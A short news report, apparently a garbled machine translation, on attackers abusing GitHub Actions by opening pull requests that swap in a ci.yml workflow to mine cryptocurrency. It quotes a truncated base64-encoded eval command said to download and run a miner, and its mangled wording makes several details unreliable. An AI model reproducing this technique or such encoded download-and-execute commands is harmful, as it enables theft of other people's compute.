github investigates A series of attacks, during which intruders managed Organize the cryptocurrency mining in the GitHub cloud infrastructure using the Github Actions to run your code. The first attempts to use GitHub Actions for Maine Nova last year.
GitHub Actions makes it possible to attach processors to automate the various operations in GitHub. For example, using Github Actions, you can perform certain checks and tests when committing committees or automate the processing of new ISSUES. To start the mining attacking, create a form of a repository, which uses Github Actions, add a new github actions and send to the original repository Pull request , offering the replacement of existing Github Actions handlers to the new Processor “.github / workflows / ci.yml”.
Malicious Pull-request generates Multiple attempts to start the GitHub ActionS handler, which after 72 The clock is interrupted due to the timeout, fails and then starts again. For attack, an attacker is enough just to create a Pull request – the handler starts automatically without any confirmation or participation from the accompanying original repository, which can only replace suspicious activity and stop the already running tasks of GitHub Actions.
In the Ci.yml attacking handler in the “Run” parameter [https://twitter.com/justinperperdok/status/1377970934955573251 is present]] Obbecked code in the form of EVAL “$ (echo ‘yxb0ihvwzgf0zsat …” | Base64 D “, which is trying to Download and execute the program for mining. In the first options attack With Different Repository on Github and Gitlab loaded a program called NPM.exe, but collected in the form of an ELF file executable for Alpine Linux (Used in Docker images).
In newer forms of attack Loading Code of type Maine XMRIG from The official repository project, which is then collected with the address of the wallet address and servers to send data.